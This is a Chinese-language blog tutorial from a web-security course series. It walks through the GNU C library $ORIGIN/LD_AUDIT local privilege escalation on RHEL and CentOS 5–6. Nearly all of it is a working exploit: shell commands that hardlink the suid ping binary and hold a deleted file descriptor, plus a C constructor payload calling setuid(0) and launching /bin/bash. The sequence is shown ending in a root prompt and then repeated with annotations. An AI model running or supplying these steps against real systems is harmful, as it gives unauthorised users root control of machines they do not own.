WEB安全第六章提权篇03 GNU C library 动态链接区 $ORIGIN 溢出提权
利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
合适用 RHEL5-RHEL6 CENTOS5-CENTOS6 均可以提权
提权方法
[moonsec@localhost
tmp]$ mkdir /tmp/exploit
[moonsec@localhost
tmp]$ ln /bin/ping /tmp/exploit/target
[moonsec@localhost
tmp]$ exec 3< /tmp/exploit/target
[moonsec@localhost
tmp]$ ls -l /proc/$$/fd/3
lr-x—— 1
moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target
[moonsec@localhost
tmp]$ rm -rf /tmp/exploit/
[moonsec@localhost
tmp]$ ls -l /proc/$$/fd/3
lr-x—— 1
moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target
(deleted)
[moonsec@localhost tmp]$ cat > payload.c -fa
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[moonsec@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[moonsec@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit
[moonsec@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@localhost tmp]# whoami
创建目录
mkdir /tmp/exploit
创建target文件硬链接
ln /bin/ping
/tmp/exploit/target
把target文件加载到内存中
exec 3
查看target在内存中的情况
ls -l /proc/$$/fd/3
删除目录
rm -rf
/tmp/exploit/
输入c代码
cat > payload.c
void
__attribute__((constructor)) init()
{
setuid(0);
system(“/bin/bash”);
}
编译文件
gcc -w -fPIC
-shared -o /tmp/exploit payload.c
提升root权限
LD_AUDIT=”\$ORIGIN” exec /proc/self/fd/3
cetnots5.5 用户moonsec 提权到root权限
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/archives/398